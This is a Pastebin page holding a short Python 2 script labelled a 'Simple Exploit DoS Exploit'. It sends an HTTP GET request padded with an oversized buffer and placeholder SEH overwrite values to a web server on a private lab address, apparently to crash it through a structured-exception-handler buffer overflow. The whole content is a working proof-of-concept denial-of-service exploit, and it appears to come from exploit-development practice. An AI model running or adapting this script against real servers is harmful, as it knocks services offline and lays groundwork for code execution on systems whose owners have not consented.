Advertisement
Guest User

Untitled

a guest
Mar 27th, 2017
48
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.46 KB | None | 0 0
  1. import socket
  2. import sys
  3.  
  4. print "Simple Exploit DoS Exploit running!"
  5. print "by Oiperion"
  6.  
  7. host = "192.168.56.1"
  8. port = 80
  9. overflow = "A" * 1189
  10. nextSEH = "BBBB"
  11. SEH = "CCCC"
  12. overflow2= "D" * 3803
  13.  
  14. crash = overflow+nextSEH+SEH+overflow2
  15.  
  16. httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  17. httpsocket.connect((host,port))
  18. httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n")
  19. httpsocket.close()
  20.  
  21.  
  22. print "Simple Exploit DoS shutted down!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement